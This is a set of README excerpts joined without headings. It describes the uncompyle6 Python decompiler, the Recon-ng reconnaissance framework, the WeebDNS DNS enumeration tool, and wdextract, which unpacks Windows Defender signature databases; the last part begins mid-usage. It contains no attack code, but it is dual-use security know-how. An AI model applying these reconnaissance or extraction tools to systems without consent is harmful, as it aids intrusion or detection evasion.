There were (and still are) a number of decompyle, uncompyle, uncompyle2, uncompyle3 forks around. Almost all of them come basically from the same code base, and (almost?) all of them are no longer actively maintained. One was really good at decompiling Python 1.5-2.3 or so, another really good at Python 2.7, but only that. Another handles Python 3.2 only; another patched that and handled only 3.3. You get the idea. This code pulls all of these forks together and moves forward. There is some serious refactoring and cleanup in this code base over those old forks.
This demonstrably does the best in decompiling Python across all Python versions. And even when there is another project that only provides decompilation for a subset of Python versions, we generally do demonstrably better for those as well. How can we tell? By taking Python bytecode that comes distributed with that version of Python and decompiling it. Among those that successfully decompile, we can then make sure the resulting programs are syntactically correct by running the Python interpreter for that bytecode version. Finally, in cases where the program has a test for itself, we can run the check on the decompiled code.
We are serious about testing, and use automated processes to find bugs. In the issue trackers for other decompilers, you will find a number of bugs we've found along the way. Very few to none of them are fixed in the other decompilers.
Requirements The code here can be run on Python versions 2.6 or later, PyPy 3-2.4, or PyPy-5.0.1. Python versions 2.4-2.7 are supported in the python-2.4 branch. The bytecode files it can read have been tested on Python bytecodes from versions 1.4, 2.1-2.7, and 3.0-3.8 and the above-mentioned PyPy versions.
Installation This uses setup.py, so it follows the standard Python routine:
pip install -e . # set up to run from source tree
# Or if you want to install instead:
python setup.py install # may need sudo
A GNU makefile is also provided so make install (possibly as root or sudo) will do the steps above.
Running Tests
make check
A GNU makefile has been added to smooth over setting up and running the right command, and to run tests from fastest to slowest. If you have remake installed, you can see the list of all tasks, including tests, via remake --tasks
Usage Run
$ uncompyle6 *compiled-python-file-pyc-or-pyo*
For usage help:
$ uncompyle6 -h
Verification In older versions of Python it was possible to verify bytecode by decompiling bytecode, and then compiling using the Python interpreter for that bytecode version. Having done this, the bytecode produced could be compared with the original bytecode. However, as Python's code generation got better, this is no longer feasible.
If you want Python syntax verification of the correctness of the decompilation process, add the --syntax-verify option. However, since Python syntax changes, you should use this option only if the bytecode matches the Python interpreter that will be checking the syntax.
You can also cross-compare the results with another Python decompiler like pycdc. Since they work differently, bugs here often aren't in that, and vice versa.
There is an interesting class of programs that are readily available and give stronger verification: those programs that, when run, test themselves. Our test suite includes these. And Python comes with another set of programs like this: its test suite for the standard library. We have some code in test/stdlib to facilitate this kind of checking too.
Known Bugs/Restrictions
The biggest known and possibly fixable (but hard) problem has to do with handling control flow. (Python has probably the most diverse and screwy set of compound statements I've ever seen; there are "else" clauses on loops and try blocks that I suspect many programmers don't know about.) All of the Python decompilers that I have looked at have problems decompiling Python's control flow. In some cases we can detect an erroneous decompilation and report that.
Python support is strongest in Python 2 for 2.7 and drops off as you get further away from that. Support is also probably pretty good for Python 2.3-2.4 since a lot of the goodness of the early versions of the decompiler from that era has been preserved (and Python compilation in that era was minimal). There is some work to do on the lower-end Python versions, which are more difficult for us to handle since we don't have a Python interpreter for versions 1.6 and 2.0.
In the Python 3 series, Python support is strongest around 3.4 or 3.3 and drops off as you move further away from those versions. Python 3.0 is weird in that in some ways it resembles 2.6 more than it does 3.1 or 2.7. Python 3.6 changes things drastically by using word codes rather than byte codes. As a result, the jump offset field in a jump instruction argument has been reduced. This makes EXTENDED_ARG instructions more prevalent in jump instructions; previously they had been rare. Perhaps to compensate for the additional EXTENDED_ARG instructions, additional jump optimization has been added. So, in sum, handling control flow by ad hoc means, as is currently done, is worse.
Between Python 3.5, 3.6 and 3.7 there have been major changes to the MAKE_FUNCTION and CALL_FUNCTION instructions.
Currently not all Python magic numbers are supported. Specifically, in some versions of Python, notably Python 3.6, the magic number has changed several times within a version. We support only released versions, not candidate versions. Note however that the magic of a released version is usually the same as the last candidate version prior to release.
There are also customized Python interpreters, notably Dropbox's, which use their own magic and encrypt bytecode. With the exception of Dropbox's old Python 2.5 interpreter, this kind of thing is not handled. We also don't handle PJOrion obfuscated code. For that, try PJOrion Deobfuscator to unscramble the bytecode to get valid bytecode before trying this tool.
This program can't decompile Microsoft Windows EXE files created by Py2EXE, although we can probably decompile the code after you extract the bytecode properly. For situations like this, you might want to consider a decompilation service like Crazy Compilers.
Handling pathologically long lists of expressions or statements is slow.
There is lots to do, so please dig in and help.
See Also
https://github.com/zrax/pycdc : purports to support all versions of Python. It is written in C++ and is most accurate for Python versions around 2.7 and 3.3 when the code was more actively developed. Accuracy for more recent versions of Python 3 and early versions of Python are especially lacking. See its issue tracker for details. Currently lightly maintained.
https://code.google.com/archive/p/unpyc3/ : supports Python 3.2 only. The above projects use a different decompiling technique than what is used here. Currently unmaintained.
https://github.com/figment/unpyc3/ : fork of above, but supports Python 3.3 only. Includes some fixes like supporting function annotations. Currently unmaintained.
https://github.com/wibiti/uncompyle2 : supports Python 2.7 only, but does that fairly well. There are situations where uncompyle6 results are incorrect while uncompyle2 results are not, but more often uncompyle6 is correct when uncompyle2 is not. Because uncompyle6 adheres to accuracy over idiomatic Python, uncompyle2 can produce more natural-looking code when it is correct. Currently uncompyle2 is lightly maintained. See its issue tracker for more details
Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open-source web-based reconnaissance quickly and thoroughly.
Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Wiki to get started.
Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. See the Development Guide for more information on building and maintaining modules.
DNS Enumeration Tool with Asynchronicity. Features WeebDNS is an 'asynchronous' DNS enumeration tool made with Python 3, which makes it much faster than normal tools.
Bugs and enhancements For bug reports or enhancements, please open an issue here.
This is the official and only repository of the WeebDNS project. Written by: FuzzyRabbit - Twitter: @rabbit_fuzzy, GitHub: @FuzzyRabbit DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE for the licensing of WeebDNS.
file - filename of VDM container (*.vdm file or MRT.exe executable);
-e optional parameter, extract all PE image chunks found in the VDM after unpacking/decrypting (this includes VFS components and emulator VDLLs).
Example:
wdextract c:\wdbase\mpasbase.vdm
wdextract c:\wdbase\mpasbase.vdm -e
wdextract c:\wdbase\mrt.exe
wdextract c:\wdbase\mrt.exe -e
Note: the base will be unpacked/decrypted to the source directory as %originalname%.extracted (e.g. if the original file is c:\wdbase\mpasbase.vdm, the unpacked file will be c:\wdbase\mpasbase.vdm.extracted). Image chunks will be dumped to a "chunks" directory created in wdextract's current directory (e.g. if wdextract is run from c:\wdbase, it will be c:\wdbase\chunks). Output files always overwrite existing ones.
Build
Source code written in C;
Built with MSVS 2017 with Windows SDK 17763 installed;
Can be built with previous versions of MSVS and SDKs.